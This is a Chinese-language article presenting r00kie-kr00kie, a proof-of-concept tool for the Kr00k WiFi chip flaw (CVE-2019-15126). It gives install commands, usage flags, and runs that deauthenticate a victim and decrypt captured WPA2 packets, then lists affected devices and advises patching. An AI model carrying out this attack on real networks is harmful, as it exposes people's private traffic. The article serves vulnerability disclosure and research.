Kr00k漏洞是Broadcom和Cypress WiFi芯片中的安全漏洞,攻击者利用该漏洞可以部分解密WPA2加密流量,泄露无线网络数据包中的数据。因为Broadcom和Cypress WiFi广泛应用于手机、平板、笔记本和IOT设备中。根据初步估计,有超过10亿设备受到该漏洞的影响。
要使用这些脚本,需要一个支持活动监控器模式和帧注入功能的WiFi卡,我们推荐用于开发和测试代码的Atheros AR9280芯片(IEEE 802.11n),我们已经在Kali Linux上测试了此PoC
安装
# clone main repo git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie # install dependencies sudo pip3 install -r requirements.txt
使用
这是实施kr00k攻击的主要漏洞利用文件
->~:python3 r00kie-kr00kie.py -h usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID] [-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY] [-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q] PoC of CVE-2019-15126 kr00k vulnerability optional arguments: -h, --help show this help message and exit -i INTERFACE, --interface INTERFACE Set wireless interface name for listen packets -l CHANNEL, --channel CHANNEL Set channel for wireless interface (default: 1) -b BSSID, --bssid BSSID Set WiFi AP BSSID (example: "01:23:45:67:89:0a") -c CLIENT, --client CLIENT Set WiFi client MAC address (example: "01:23:45:67:89:0b") -n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER Set number of deauth packets for one iteration (default: 5) -d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY Set delay between sending deauth packets (default: 5) -p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ Set path to PCAP file for read encrypted packets -r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT Set path to PCAP file for write decrypted packets -q, --quiet Minimal output
为了发起攻击,需要知道访问点的bssid,其通道和受害者的mac地址,可以使用该airodump-ng wlan0找到它们。
运行漏洞利用代码:
->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11 /$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$ | $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/ | $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$ | $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$ | $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$ | $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/ | $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$ |__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/ /$$ /$$$$$$ /$$$$$$ /$$ /$$ | $$ /$$$_ $$ /$$$_ $$| $$ |__/ | $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$ | $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$ | $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$ | $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/ | $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$ |__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/ v0.0.1 https://hexway.io/research/r00kie-kr00kie/ [!] Kill processes that prevent monitor mode! [*] Wireless interface: wlan0 already in mode monitor [*] Set channel: 11 on wireless interface: wlan0 [*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A [*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A [*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A [+] Got a kr00ked packet: ###[ Ethernet ]### dst = d4:38:9c:82:23:7a src = 88:c9:d0:fb:88:d1 type = IPv4 ###[ IP ]### version = 4 ihl = 5 tos = 0x0 len = 60 id = 30074 flags = DF frag = 0 ttl = 64 proto = udp chksum = 0xcce1 src = 192.168.43.161 dst = 8.8.4.4 \options \ ###[ UDP ]### sport = 60744 dport = domain len = 40 chksum = 0xa649 ###[ DNS ]### id = 55281 qr = 0 opcode = QUERY aa = 0 tc = 0 rd = 1 ra = 0 z = 0 ad = 0 cd = 0 rcode = ok qdcount = 1 ancount = 0 nscount = 0 arcount = 0 \qd \ |###[ DNS Question Record ]### | qname = 'g.whatsapp.net.' | qtype = A | qclass = IN an = None ns = None ar = None [+] Got a kr00ked packet: ###[ Ethernet ]### dst = d4:38:9c:82:23:7a src = 88:c9:d0:fb:88:d1 type = IPv4 ###[ IP ]### version = 4 ihl = 5 tos = 0x0 len = 60 id = 30075 flags = DF frag = 0 ttl = 64 proto = udp chksum = 0xcce0 src = 192.168.43.161 dst = 8.8.4.4 \options \ ###[ UDP ]### sport = 60744 dport = domain len = 40 chksum = 0x104b ###[ DNS ]### id = 28117 qr = 0 opcode = QUERY aa = 0 tc = 0 rd = 1 ra = 0 z = 0 ad = 0 cd = 0 rcode = ok qdcount = 1 ancount = 0 nscount = 0 arcount = 0 \qd \ |###[ DNS Question Record ]### | qname = 'g.whatsapp.net.' | qtype = AAAA | qclass = IN an = None ns = None ar = None
此外,如果kr00t攻击后已经拦截了流量(pcap文件),则可以解密:
->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
load = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
###[ TCP ]###
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]
[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap该UDP脚本从受害者处拦截流量,以演示kr00k攻击:
->~:python3 traffic_generator.py Sending payload to the UDP port 53 on 8.8.8.8 Press Ctrl+C to exit
以下设备受到Kr00k漏洞的影响:
· Amazon Echo 2
· Amazon Kindle 8
· 苹果 iPad mini 2
· 苹果 iPhone 6, 6S, 8, XR
· 苹果 MacBook Air Retina 13-inch 2018
· Google Nexus 5
· Google Nexus 6
· Google Nexus 6S
· Raspberry Pi 3
· 三星 Galaxy S4 GT-I9505
· 三星 Galaxy S8
· 小米Redmi 3S
· Asus RT-N12
· 华为 B612S-25d
· 华为 EchoLife HG8245H
· 华为 E5577Cs-321
目前Broadcom和 Cypress已经发布了固件补丁给相关厂商,建议用户尽快安装相关补丁。
本文翻译自:https://www.kitploit.com/2020/03/r00kie-kr00kie-poc-exploit-for-cve-2019.html如若转载,请注明原文地址:
文章来源: https://www.4hou.com/posts/A9yO
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh